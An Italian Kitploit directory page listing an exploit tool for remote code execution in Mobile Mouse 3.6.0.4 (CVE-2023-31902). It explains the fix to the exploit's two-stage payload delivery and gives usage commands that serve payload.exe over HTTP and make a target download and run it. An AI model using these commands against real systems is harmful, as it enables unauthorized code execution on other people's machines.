Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
mouseserver-exploit — Mobile Mouse 3.6.0.4 - Esecuzione di codice in remoto - CVE-2023-31902 | Kitploit
Strumenti/GitHubGitHub/lypd0/mouseserver-exploit
Analisi delle VulnerabilitàExploitPenetration TestingRed Teaming
GitHublypd0/mouseserver-exploit

mouseserver-exploit

Mobile Mouse 3.6.0.4 - Esecuzione di codice in remoto - CVE-2023-31902

Vedi Repository
117 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Mobile Mouse 3.6.0.4 RCE - Correzione

Una versione corretta dell'exploit di esecuzione remota di codice per Mobile Mouse 3.6.0.4 pubblicato come EDB-51010.

Vulnerabilità

  • CVE: CVE-2023-31902
  • Versione interessata: Mobile Mouse 3.6.0.4
  • Porta predefinita: TCP/9099

Cosa è stato corretto

L'exploit originale scarica correttamente il payload ma potrebbe non riuscire a eseguirlo perché entrambe le fasi utilizzano la stessa connessione TCP.

Questa versione:

  • Scarica il payload tramite la prima sessione
  • Attende il completamento del download
  • Apre una nuova connessione
  • Ripete l'handshake di Mobile Mouse
  • Esegue il payload scaricato

Utilizza inoltre sendall(), percorsi Windows correttamente escapati, timeout di socket e una gestione base degli errori.

Utilizzo

Avvia un server HTTP nella directory del payload:

root@kitploit:~
python3 -m http.server 8080

Esegui l'exploit:

root@kitploit:~
python3 exploit.py \
  --target 192.168.1.50 \
  --lhost 192.168.1.10 \
  --file payload.exe

Esclusione di responsabilità

Questo progetto è destinato esclusivamente a test di sicurezza autorizzati e a ricerca educativa. Non utilizzarlo contro sistemi senza autorizzazione esplicita.

Scarica lo strumento